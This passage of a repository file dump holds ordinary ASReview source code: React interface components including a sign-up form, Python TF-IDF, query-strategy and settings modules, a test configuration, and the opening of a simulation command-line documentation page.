Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport { Upload } from \"@mui/icons-material\";\n\nimport { TypographyH5Medium } from \"../../StyledComponents/StyledTypography.js\";\n\nconst PREFIX = \"DashboardPageHeader\";\n\nconst classes = {\n headerButton: `${PREFIX}-header-button`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n background: theme.palette.background.paper,\n [`& .${classes.headerButton}`]: {\n backgroundColor: [\n theme.palette.mode === \"dark\"\n ? theme.palette.grey[900]\n : theme.palette.grey[100],\n ],\n [theme.breakpoints.down(\"md\")]: {\n width: 24,\n height: 24,\n },\n },\n}));\n\nexport default function DashboardPageHeader(props) {\n return (\n <Root className=\"main-page-sticky-header-wrapper\">\n <Box className=\"main-page-sticky-header with-button\">\n {!props.mobileScreen && (\n <TypographyH5Medium>Projects dashboard</TypographyH5Medium>\n )}\n {props.mobileScreen && (\n <Typography variant=\"h6\">Projects dashboard</Typography>\n )}\n <Stack direction=\"row\" spacing={1}>\n <Tooltip title=\"Import project\">\n <IconButton\n disableRipple\n onClick={props.toggleImportDialog}\n size={!props.mobileScreen ? \"medium\" : \"small\"}\n >\n <Avatar className={classes.headerButton}>\n <Upload\n color=\"primary\"\n fontSize={!props.mobileScreen ? \"medium\" : \"small\"}\n />\n </Avatar>\n </IconButton>\n </Tooltip>\n </Stack>\n </Box>\n </Root>\n );\n}\n" }, { "alpha_fraction": 0.6463158130645752, "alphanum_fraction": 0.6522806882858276, "avg_line_length": 36.5, "blob_id": "496f213e9fb95aa069d0c383ab3554b094d1055a", "content_id": "a1da3746a02dbc73c473e5eccaba45c9eaa483a2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2850, "license_type": "permissive", "max_line_length": 80, "num_lines": 76, "path": "/asreview/models/feature_extraction/tfidf.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\nfrom asreview.models.feature_extraction.base import BaseFeatureExtraction\n\n\nclass Tfidf(BaseFeatureExtraction):\n \"\"\"TF-IDF feature extraction technique (``tfidf``).\n\n Use the standard TF-IDF (Term Frequency-Inverse Document Frequency) feature\n extraction technique from `SKLearn <https://scikit-learn.org/stable/modules/\n generated/sklearn.feature_extraction.text.TfidfVectorizer.html>`__. Gives a\n sparse matrix as output. Works well in combination with\n :class:`asreview.models.classifiers.NaiveBayesClassifier` and other fast\n training models (given that the features vectors are relatively wide).\n\n Arguments\n ---------\n ngram_max: int\n Can use up to ngrams up to ngram_max. For example in the case of\n ngram_max=2, monograms and bigrams could be used.\n stop_words: str\n When set to 'english', use stopwords. If set to None or 'none',\n do not use stop words.\n \"\"\"\n\n name = \"tfidf\"\n label = \"TF-IDF\"\n\n def __init__(self, *args, ngram_max=1, stop_words=\"english\", **kwargs):\n \"\"\"Initialize tfidf class.\"\"\"\n super(Tfidf, self).__init__(*args, **kwargs)\n self.ngram_max = ngram_max\n self.stop_words = stop_words\n if stop_words is None or stop_words.lower() == \"none\":\n sklearn_stop_words = None\n else:\n sklearn_stop_words = self.stop_words\n self._model = TfidfVectorizer(\n ngram_range=(1, ngram_max), stop_words=sklearn_stop_words\n )\n\n def fit(self, texts):\n self._model.fit(texts)\n\n def transform(self, texts):\n X = self._model.transform(texts).tocsr()\n return X\n\n def full_hyper_space(self):\n from hyperopt import hp\n\n hyper_space, hyper_choices = super(Tfidf, self).full_hyper_space()\n hyper_choices.update({\"fex_stop_words\": [\"english\", \"none\"]})\n hyper_space.update(\n {\n \"fex_ngram_max\": hp.uniformint(\"fex_ngram_max\", 1, 3),\n \"fex_stop_words\": hp.choice(\n \"fex_stop_words\", hyper_choices[\"fex_stop_words\"]\n ),\n }\n )\n return hyper_space, hyper_choices\n" }, { "alpha_fraction": 0.7554348111152649, "alphanum_fraction": 0.7554348111152649, "avg_line_length": 60.33333206176758, "blob_id": "f1ddc742a08ec03187760f2de581de478cc5f678", "content_id": "fbbde4bd98a48f5dbb255e24235f4bfe8b4aee6c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 736, "license_type": "permissive", "max_line_length": 75, "num_lines": 12, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/DataComponents/index.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "export { default as AddDataset } from \"./AddDataset\";\nexport { default as AddPriorKnowledge } from \"./AddPriorKnowledge\";\nexport { default as DataForm } from \"./DataForm\";\nexport { default as DataFormCard } from \"./DataFormCard\";\nexport { default as DatasetFromEntryPoint } from \"./DatasetFromEntryPoint\";\nexport { default as DatasetFromURL } from \"./DatasetFromURL\";\nexport { default as EnoughPriorBanner } from \"./EnoughPriorBanner\";\nexport { default as EntryPointDataset } from \"./EntryPointDataset\";\nexport { default as PriorLabeled } from \"./PriorLabeled\";\nexport { default as PriorRandom } from \"./PriorRandom\";\nexport { default as PriorSearch } from \"./PriorSearch\";\nexport { default as PriorUnlabeled } from \"./PriorUnlabeled\";\n" }, { "alpha_fraction": 0.5361050367355347, "alphanum_fraction": 0.5390226244926453, "avg_line_length": 26.420000076293945, "blob_id": "045849dfb509cd4f81206a65b5f8d6e46b18e324", "content_id": "41ccaaa13571ade4c7cf20a46d00604967622013", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1371, "license_type": "permissive", "max_line_length": 70, "num_lines": 50, "path": "/asreview/webapp/src/ProjectComponents/HistoryComponents/LabelChip.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { Chip, Stack } from \"@mui/material\";\n\nexport default function LabelChip(props) {\n const handleClickRelevant = () => {\n props.setLabel(\"relevant\");\n };\n\n const handleClickIrrelevant = () => {\n props.setLabel(\"irrelevant\");\n };\n\n const handleClickAll = () => {\n props.setLabel(\"all\");\n };\n\n return (\n <Stack direction=\"row\" spacing={2} sx={{ padding: \"8px 24px\" }}>\n <Chip\n label={\n !props.n_prior_inclusions\n ? \"Relevant\"\n : `Relevant (${props.n_prior_inclusions})`\n }\n color=\"primary\"\n variant={props.label === \"relevant\" ? \"filled\" : \"outlined\"}\n onClick={handleClickRelevant}\n size={!props.mobileScreen ? \"medium\" : \"small\"}\n />\n <Chip\n label={\n !props.n_prior_exclusions\n ? \"Irrelevant\"\n : `Irrelevant (${props.n_prior_exclusions})`\n }\n color=\"primary\"\n variant={props.label === \"irrelevant\" ? \"filled\" : \"outlined\"}\n onClick={handleClickIrrelevant}\n size={!props.mobileScreen ? \"medium\" : \"small\"}\n />\n <Chip\n label={\"All\"}\n color=\"primary\"\n variant={props.label === \"all\" ? \"filled\" : \"outlined\"}\n onClick={handleClickAll}\n size={!props.mobileScreen ? \"medium\" : \"small\"}\n />\n </Stack>\n );\n}\n" }, { "alpha_fraction": 0.4470854699611664, "alphanum_fraction": 0.45897001028060913, "avg_line_length": 25.97709846496582, "blob_id": "857bcad2769678efb2edf9e0d1c383e50b936d14", "content_id": "7af5ed7c11efcfb818bb778187911f3303d5ec2a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 3534, "license_type": "permissive", "max_line_length": 80, "num_lines": 131, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/DataComponents/DataFormCard.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport {\n Box,\n Button,\n Card,\n CardContent,\n Stack,\n Typography,\n} from \"@mui/material\";\nimport { Check } from \"@mui/icons-material\";\nimport { styled } from \"@mui/material/styles\";\n\nconst PREFIX = \"DataFormCard\";\n\nconst classes = {\n cardContent: `${PREFIX}-card-content`,\n cardOverlay: `${PREFIX}-card-overlay`,\n singleLine: `${PREFIX}-single-line`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n [`& .${classes.cardContent}`]: {\n display: \"flex\",\n alignItems: \"center\",\n justifyContent: \"space-between\",\n padding: 24,\n paddingRight: 8,\n position: \"relative\",\n },\n\n [`& .${classes.cardOverlay}`]: {\n height: \"100%\",\n width: \"100%\",\n left: 0,\n pointerEvents: \"none\",\n position: \"absolute\",\n zIndex: 1,\n },\n\n [`& .${classes.singleLine}`]: {\n display: \"-webkit-box\",\n WebkitBoxOrient: \"vertical\",\n WebkitLineClamp: 2,\n whiteSpace: \"pre-line\",\n overflow: \"hidden\",\n },\n}));\n\nconst DataFormCard = (props) => {\n return (\n <Root>\n <Card\n elevation={0}\n sx={{\n bgcolor: (theme) =>\n theme.palette.mode === \"dark\" ? \"background.paper\" : \"grey.100\",\n }}\n >\n <CardContent className={classes.cardContent}>\n <Box\n className={classes.cardOverlay}\n sx={{\n bgcolor: (theme) => {\n if (props.datasetAdded !== undefined && !props.datasetAdded) {\n if (theme.palette.mode === \"dark\") {\n return \"rgba(40, 40, 40, 0.7)\";\n } else {\n return \"rgba(255, 255, 255, 0.5)\";\n }\n } else {\n return \"transparent\";\n }\n },\n }}\n />\n {!props.added && (\n <Stack spacing={1}>\n <Typography\n variant=\"subtitle1\"\n className={classes.singleLine}\n sx={{\n fontWeight: (theme) => theme.typography.fontWeightMedium,\n }}\n >\n {props.primaryDefault}\n </Typography>\n <Typography\n variant=\"body2\"\n className={classes.singleLine}\n sx={{ color: \"text.secondary\" }}\n >\n {props.secondaryDefault}\n </Typography>\n </Stack>\n )}\n {props.added && (\n <Stack spacing={1}>\n <Typography\n variant=\"subtitle1\"\n className={classes.singleLine}\n sx={{\n fontWeight: (theme) => theme.typography.fontWeightMedium,\n }}\n >\n {props.primaryAdded}\n </Typography>\n <Typography\n variant=\"body2\"\n className={classes.singleLine}\n sx={{ color: \"text.secondary\" }}\n >\n {props.secondaryAdded}\n </Typography>\n </Stack>\n )}\n <Stack direction=\"row\" sx={{ alignItems: \"center\" }}>\n {props.added && <Check color=\"success\" sx={{ mr: 1 }} />}\n <Button\n disabled={props.datasetAdded !== undefined && !props.datasetAdded}\n onClick={props.toggleAddCard}\n >\n {!props.added ? \"Add\" : \"Edit\"}\n </Button>\n </Stack>\n </CardContent>\n </Card>\n </Root>\n );\n};\n\nexport default DataFormCard;\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.8125, "avg_line_length": 15, "blob_id": "0eb81376f9f6b02ed62838a6e90005d37fde82d6", "content_id": "ddca4a6a3fe4c416df0150a8d1981ecc8d4b848c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 96, "license_type": "permissive", "max_line_length": 23, "num_lines": 6, "path": "/docs/requirements.txt", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "ipython\nsphinx==5.0.1\nsphinx_rtd_theme==1.0.0\nsphinx-reredirects\nsphinxcontrib-youtube\nnbsphinx\n" }, { "alpha_fraction": 0.7931034564971924, "alphanum_fraction": 0.7931034564971924, "avg_line_length": 18.66666603088379, "blob_id": "8fa18f2727690a7c18710dd9eb01a193d04695c1", "content_id": "aa05e2a056a3fe26b41dce441d1a74a5449802a2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 58, "license_type": "permissive", "max_line_length": 30, "num_lines": 3, "path": "/asreview/webapp/tests/config/no_auth_config.toml", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "TESTING = true\nDEBUG = true\nAUTHENTICATION_ENABLED = false" }, { "alpha_fraction": 0.6661984920501709, "alphanum_fraction": 0.6722846627235413, "avg_line_length": 31.86153793334961, "blob_id": "2ece88b7f7db7c7a5658969dfad031f1b6f20115", "content_id": "3c7ec11b732b08a4c9ebe8fd263f90901ad2e09a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2136, "license_type": "permissive", "max_line_length": 79, "num_lines": 65, "path": "/asreview/models/query/base.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom abc import abstractmethod\n\nfrom asreview.models.base import BaseModel\n\n\nclass BaseQueryStrategy(BaseModel):\n \"\"\"Abstract class for query strategies.\"\"\"\n\n name = \"base-query\"\n\n @abstractmethod\n def query(self, X, classifier=None, n_instances=None, **kwargs):\n \"\"\"Query new instances.\n\n Arguments\n ---------\n X: numpy.ndarray\n Feature matrix to choose samples from.\n classifier: SKLearnModel\n Trained classifier to compute probabilities if they are necessary.\n n_instances: int\n Number of instances to query.\n\n Returns\n -------\n (numpy.ndarray, numpy.ndarray)\n The first is an array of shape (n_instances,) containing the row\n indices of the new instances in query order. The second is an array\n of shape (n_instances, n_feature_matrix_columns), containing the\n feature vectors of the new instances.\n \"\"\"\n raise NotImplementedError\n\n\nclass ProbaQueryStrategy(BaseQueryStrategy):\n name = \"proba\"\n\n def query(self, X, classifier, n_instances=None, **kwargs):\n \"\"\"Query method for strategies which use class probabilities.\"\"\"\n if n_instances is None:\n n_instances = X.shape[0]\n\n predictions = classifier.predict_proba(X)\n\n query_idx = self._query(predictions, n_instances, X)\n\n return query_idx\n\n @abstractmethod\n def _query(self, predictions, n_instances, X=None):\n raise NotImplementedError\n" }, { "alpha_fraction": 0.515561580657959, "alphanum_fraction": 0.5277401804924011, "avg_line_length": 25.39285659790039, "blob_id": "de706b6602141c762104a6e7d6f8fc3d44ffafb5", "content_id": "5be2c738f91d350277be8c63809de8fdc806059d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 739, "license_type": "permissive", "max_line_length": 74, "num_lines": 28, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/InfoCard.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { Box, Card, Typography } from \"@mui/material\";\nimport InfoOutlinedIcon from \"@mui/icons-material/InfoOutlined\";\n\nexport default function InfoCard(props) {\n return (\n <Card\n elevation={0}\n sx={{\n bgcolor: (theme) =>\n theme.palette.mode === \"dark\" ? \"background.paper\" : \"grey.100\",\n }}\n >\n <Box sx={{ display: \"flex\", alignItems: \"center\", p: 2 }}>\n <InfoOutlinedIcon\n fontSize=\"small\"\n sx={{ color: \"text.secondary\", mr: 1 }}\n />\n <Typography\n variant=\"body2\"\n sx={{ color: \"text.secondary\", fontSize: \"13px\" }}\n >\n {props.info}\n </Typography>\n </Box>\n </Card>\n );\n}\n" }, { "alpha_fraction": 0.5786980390548706, "alphanum_fraction": 0.5808374285697937, "avg_line_length": 32.55897521972656, "blob_id": "c32447be3411fd25d87a3bd1a37a8cee82fdd99c", "content_id": "047b2565baa790152b896ff7a84dda52cd463237", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6544, "license_type": "permissive", "max_line_length": 88, "num_lines": 195, "path": "/asreview/settings.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\nimport os\nfrom configparser import ConfigParser\n\nfrom asreview.config import DEFAULT_N_INSTANCES\nfrom asreview.models.balance import get_balance_model\nfrom asreview.models.classifiers import get_classifier\nfrom asreview.models.feature_extraction import get_feature_model\nfrom asreview.models.query import get_query_model\nfrom asreview.types import type_n_queries\nfrom asreview.utils import pretty_format\n\nSETTINGS_TYPE_DICT = {\n \"model\": str,\n \"query_strategy\": str,\n \"balance_strategy\": str,\n \"feature_extraction\": str,\n \"n_instances\": int,\n \"stop_if\": type_n_queries,\n \"n_prior_included\": int,\n \"n_prior_excluded\": int,\n \"mode\": str,\n \"model_param\": dict,\n \"query_param\": dict,\n \"feature_param\": dict,\n \"balance_param\": dict,\n}\n\n\ndef _map_settings_type(name, value):\n if value is None:\n return None\n\n try:\n return SETTINGS_TYPE_DICT[name](value)\n except TypeError:\n raise TypeError(f\"Can't convert setting '{name}' to {SETTINGS_TYPE_DICT[name]}\")\n\n\ndef _convert_types(par_defaults, param):\n \"\"\"Convert strings from the config file to the appropriate type.\"\"\"\n for par in param:\n try:\n par_type = type(par_defaults[par])\n if par_type == bool:\n param[par] = param[par] in [\"True\", \"true\", \"T\", \"t\", True]\n else:\n try:\n param[par] = par_type(param[par])\n except TypeError:\n raise TypeError(f\"Error converting key in config file: {par}\")\n except KeyError:\n logging.warning(\n f\"Parameter {par} does not have a default.\\n\"\n f\"Defaults: {par_defaults}.\"\n )\n\n\nclass ASReviewSettings(object):\n \"\"\"Object to store the configuration of a review session.\n\n The main difference being that it type checks (some)\n of its contents.\n \"\"\"\n\n def __init__(\n self,\n model,\n query_strategy,\n balance_strategy,\n feature_extraction,\n n_instances=DEFAULT_N_INSTANCES,\n stop_if=None,\n n_prior_included=None,\n n_prior_excluded=None,\n as_data=None,\n model_param={},\n query_param={},\n balance_param={},\n feature_param={},\n data_fp=None,\n n_queries=None,\n abstract_only=False, # deprecated\n mode=None, # deprecated\n n_papers=None, # deprecated\n data_name=None, # deprecated\n ):\n self.model = model\n self.query_strategy = query_strategy\n self.balance_strategy = balance_strategy\n self.feature_extraction = feature_extraction\n self.n_instances = n_instances\n self.stop_if = stop_if\n self.n_prior_included = n_prior_included\n self.n_prior_excluded = n_prior_excluded\n self.as_data = as_data\n self.model_param = model_param\n if query_strategy == \"max_random\":\n query_param_copy = query_param.copy()\n try:\n del query_param_copy[\"strategy_1\"]\n del query_param_copy[\"strategy_2\"]\n except KeyError:\n pass\n self.query_param = query_param_copy\n else:\n self.query_param = query_param\n self.balance_param = balance_param\n self.feature_param = feature_param\n\n def __str__(self):\n return pretty_format(self.to_dict())\n\n def __setattr__(self, name, value):\n try:\n super(ASReviewSettings, self).__setattr__(\n name, _map_settings_type(name, value)\n )\n except KeyError:\n super(ASReviewSettings, self).__setattr__(name, value)\n\n def to_dict(self):\n \"\"\"Export default settings to dict.\"\"\"\n info_dict = {}\n for attrib in SETTINGS_TYPE_DICT:\n value = getattr(self, attrib, None)\n if value is not None:\n info_dict[attrib] = value\n return info_dict\n\n def from_file(self, config_file):\n \"\"\"Fill the contents of settings by reading a config file.\n\n Arguments\n ---------\n config_file: str\n Source configuration file.\n\n \"\"\"\n if config_file is None or not os.path.isfile(config_file):\n if config_file is not None:\n print(f\"Didn't find configuration file: {config_file}\")\n return\n\n config = ConfigParser()\n config.optionxform = str\n config.read(config_file)\n\n # Read the each of the sections.\n for sect in config:\n if sect == \"global_settings\":\n for key, value in config.items(sect):\n try:\n setattr(self, key, SETTINGS_TYPE_DICT[key](value))\n except (KeyError, TypeError):\n print(\n f\"Warning: value with key '{key}' is ignored \"\n \"(spelling mistake, wrong type?).\"\n )\n\n elif sect in [\n \"model_param\",\n \"query_param\",\n \"balance_param\",\n \"feature_param\",\n ]:\n setattr(self, sect, dict(config.items(sect)))\n elif sect != \"DEFAULT\":\n print(\n f\"Warning: section [{sect}] is ignored in \"\n f\"config file {config_file}\"\n )\n\n model = get_classifier(self.model)\n _convert_types(model.default_param, self.model_param)\n balance_model = get_balance_model(self.balance_strategy)\n _convert_types(balance_model.default_param, self.balance_param)\n query_model = get_query_model(self.query_strategy)\n _convert_types(query_model.default_param, self.query_param)\n feature_model = get_feature_model(self.feature_extraction)\n _convert_types(feature_model.default_param, self.feature_param)\n" }, { "alpha_fraction": 0.457250714302063, "alphanum_fraction": 0.46080389618873596, "avg_line_length": 31.16428565979004, "blob_id": "3059e935e15a39d4f42854d0d69848a651ae6101", "content_id": "b79e732ceb4b32f5f297a829d3b7158df2c4ee81", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 9006, "license_type": "permissive", "max_line_length": 96, "num_lines": 280, "path": "/asreview/webapp/src/Components/SignUpForm.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { useNavigate } from \"react-router-dom\";\nimport { useMutation } from \"react-query\";\nimport LoadingButton from \"@mui/lab/LoadingButton\";\nimport {\n Box,\n Button,\n Card,\n CardContent,\n Checkbox,\n Fade,\n FormControl,\n FormControlLabel,\n FormHelperText as FHT,\n Stack,\n TextField,\n Typography,\n} from \"@mui/material\";\n\nimport { InlineErrorHandler } from \".\";\nimport { WordmarkState } from \"../globals\";\nimport { styled } from \"@mui/material/styles\";\nimport { HelpPrivacyTermsButton } from \"../Components\";\nimport { useToggle } from \"../hooks/useToggle\";\nimport BaseAPI from \"../api/AuthAPI\";\nimport { useFormik } from \"formik\";\nimport * as Yup from \"yup\";\n\nconst PREFIX = \"SignUpForm\";\n\nconst classes = {\n button: `${PREFIX}-button`,\n card: `${PREFIX}-card`,\n cardContent: `${PREFIX}-card-content`,\n logo: `${PREFIX}-logo`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n display: \"flex\",\n height: \"100%\",\n width: \"100%\",\n alignItems: \"center\",\n justifyContent: \"center\",\n position: \"absolute\",\n [`& .${classes.button}`]: {\n paddingTop: theme.spacing(3),\n paddingBottom: theme.spacing(3),\n justifyContent: \"space-between\",\n },\n\n [`& .${classes.card}`]: {\n borderRadius: theme.spacing(2),\n width: \"500px\",\n },\n\n [`& .${classes.cardContent}`]: {\n padding: \"48px 40px !important\",\n },\n\n [`& .${classes.logo}`]: {\n width: \"100%\",\n maxWidth: \"130px\",\n },\n}));\n\n// VALIDATION SCHEMA\nconst SignupSchema = Yup.object().shape({\n email: Yup.string().email(\"Invalid email\").required(\"Email is required\"),\n name: Yup.string().required(\"Full name is required\"),\n affiliation: Yup.string()\n .min(2, \"Affiliation must be at least 2 characters long\")\n .required(\"Affiliation is required\"),\n password: Yup.string()\n .matches(\n /^(?=.*[A-Za-z])(?=.*\\d)(?=.*[@$!%*?&#])[A-Za-z\\d@$!%*?&#]{8,}$/,\n \"Use 8 or more characters with a mix of letters, numbers & symbols\",\n )\n .required(\"Password is required\"),\n confirmPassword: Yup.string()\n .required(\"Password confirmation is required\")\n .oneOf([Yup.ref(\"password\"), null], \"Passwords must match\"),\n});\n\nconst SignUpForm = (props) => {\n // Pass the useFormik() hook initial form values, a validate function that will be called when\n // form values change or fields are blurred, and a submit function that will\n // be called when the form is submitted\n const navigate = useNavigate();\n\n const [showPassword, toggleShowPassword] = useToggle();\n\n const returnType = () => {\n return !showPassword ? \"password\" : \"text\";\n };\n\n const initialValues = {\n email: \"\",\n name: \"\",\n affiliation: \"\",\n password: \"\",\n confirmPassword: \"\",\n publicAccount: true,\n };\n\n const formik = useFormik({\n initialValues: initialValues,\n validationSchema: SignupSchema,\n });\n\n const { error, isError, mutate } = useMutation(BaseAPI.signup, {\n onSuccess: () => {\n formik.setValues(initialValues, false);\n navigate(\"/signin\");\n },\n });\n\n const handleSubmit = () => {\n mutate(formik.values);\n };\n\n const handleSignIn = () => {\n navigate(\"/signin\");\n };\n\n const handleEnterKey = (e) => {\n if (e.keyCode === 13) {\n handleSubmit(e);\n }\n };\n\n return (\n <Root>\n <Fade in>\n <Box>\n <Card className={classes.card} variant=\"outlined\">\n <CardContent className={classes.cardContent}>\n <Stack spacing={3}>\n <img\n className={classes.logo}\n src={WordmarkState()}\n alt=\"ASReview LAB\"\n />\n <Typography variant=\"h5\">Create your profile</Typography>\n <Stack\n spacing={3}\n component=\"form\"\n noValidate\n autoComplete=\"off\"\n >\n <TextField\n id=\"email\"\n label=\"Email\"\n size=\"small\"\n fullWidth\n value={formik.values.email}\n onChange={formik.handleChange}\n onBlur={formik.handleBlur}\n />\n {formik.touched.email && formik.errors.email ? (\n <FHT error={true}>{formik.errors.email}</FHT>\n ) : null}\n <TextField\n id=\"name\"\n label=\"Full name\"\n size=\"small\"\n fullWidth\n value={formik.values.name}\n onChange={formik.handleChange}\n onBlur={formik.handleBlur}\n />\n {formik.touched.name && formik.errors.name ? (\n <FHT error={true}>{formik.errors.name}</FHT>\n ) : null}\n <TextField\n id=\"affiliation\"\n label=\"Affiliation\"\n size=\"small\"\n fullWidth\n value={formik.values.affiliation}\n onChange={formik.handleChange}\n onBlur={formik.handleBlur}\n />\n {formik.touched.affiliation && formik.errors.affiliation ? (\n <FHT error={true}>{formik.errors.affiliation}</FHT>\n ) : null}\n <FormControl>\n <Stack direction=\"row\" spacing={2}>\n <TextField\n id=\"password\"\n label=\"Password\"\n size=\"small\"\n fullWidth\n type={returnType()}\n value={formik.values.password}\n onChange={formik.handleChange}\n onBlur={formik.handleBlur}\n />\n <TextField\n id=\"confirmPassword\"\n label=\"Confirm Password\"\n size=\"small\"\n fullWidth\n type={returnType()}\n onKeyDown={handleEnterKey}\n value={formik.values.confirmPassword}\n onChange={formik.handleChange}\n onBlur={formik.handleBlur}\n />\n </Stack>\n </FormControl>\n {formik.touched.password && formik.errors.password ? (\n <FHT error={true}>{formik.errors.password}</FHT>\n ) : null}\n {formik.touched.confirmPassword &&\n formik.errors.confirmPassword ? (\n <FHT error={true}>{formik.errors.confirmPassword}</FHT>\n ) : null}\n <FormControl>\n <FormControlLabel\n control={\n <Checkbox\n id=\"public\"\n color=\"primary\"\n onChange={toggleShowPassword}\n />\n }\n label=\"Show password\"\n />\n {false && (\n <>\n <FormControlLabel\n control={\n <Checkbox\n color=\"primary\"\n id=\"publicAccount\"\n defaultChecked={formik.values.publicAccount}\n value={formik.values.publicAccount}\n onChange={formik.handleChange}\n onBlur={formik.handleBlur}\n />\n }\n label=\"Make this account public\"\n />\n <FHT>\n Making this account public allows you to collaborate.\n </FHT>\n </>\n )}\n </FormControl>\n {isError && <InlineErrorHandler message={error.message} />}\n\n <Stack className={classes.button} direction=\"row\">\n <Button\n onClick={handleSignIn}\n sx={{ textTransform: \"none\" }}\n >\n Sign In instead\n </Button>\n <LoadingButton\n //loading={isLoading}\n variant=\"contained\"\n color=\"primary\"\n onClick={handleSubmit}\n disabled={!(formik.isValid && formik.dirty)}\n >\n Create\n </LoadingButton>\n </Stack>\n </Stack>\n </Stack>\n </CardContent>\n </Card>\n <HelpPrivacyTermsButton />\n </Box>\n </Fade>\n </Root>\n );\n};\n\nexport default SignUpForm;\n" }, { "alpha_fraction": 0.7007912397384644, "alphanum_fraction": 0.7091878056526184, "avg_line_length": 30.27777862548828, "blob_id": "4f2d93d91d07d80781d36d34a44b1d2e69ecd5dd", "content_id": "81d130b02257c5f87cdfed639eeeea92f3fb9bd9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 6295, "license_type": "permissive", "max_line_length": 110, "num_lines": 198, "path": "/docs/source/simulation_cli.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Simulation via command line\n===========================\n\nASReview LAB comes with a command line interface for simulating the\nperformance of ASReview algorithm.\n\n.. _simulation-cli-getting-started:\n\nGetting started\n---------------\n\nThe simulation command line tool can be accessed directly like:\n\n.. code-block:: bash\n\n\tasreview simulate MY_DATASET.csv -s MY_SIMULATION.asreview\n\nThis performs a simulation with the default active learning model, where\n``MY_DATASET.csv`` is the path to the :ref:`data_labeled:Fully labeled data`\nyou want to simulate. The result of the simulation is stored, after a\nsuccessful simulation, at ``MY_SIMULATION.asreview`` where ``MY_SIMULATION``\nis the filename you prefer and the extension is ``.asreview``\n(ASReview project file extension).\n\nSimulation progress\n-------------------\n\nThe progress of the simulation is given with two progress bars. The top one is\nused to count the number of relevant records found. The bottom one monitors\nthe number of records labeled. By default (with ``--stop-if min``), the\nsimulation stops once the the top progress bar reaches 100%.\n\n.. code-block:: bash\n\n Simulation started\n\n Relevant records found: 100%|███████████████████████████████████████████████| 43/43 [00:03<00:00, 13.42it/s]\n Records labeled : 7%|██▉ | 420/6189 [00:03<00:43, 133.58it/s]\n\n Simulation finished\n\nCommand line arguments for simulating\n-------------------------------------\n\nThe command ``asreview simulate --help`` provides an overview of available\narguments for the simulation.\n\nEach of the sections below describe the available arguments. The example below\nshows how you can set the command line arguments. This can be helpful if you\nare new to the using the command line. For example, you want to change the\nquery strategy being used. The command line and this documentation show\n``-q, --query_strategy QUERY_STRATEGY``. The default is ``max``. If you want\nto change it to ``max_random``, you use:\n\n.. code-block:: bash\n\n asreview simulate MY_DATASET.csv -s MY_SIMULATION.asreview -q max_random\n\n\nDataset\n~~~~~~~\n\n.. option:: dataset\n\n Required. File path or URL to the dataset or one of the benchmark datasets.\n\nYou can also use one of the 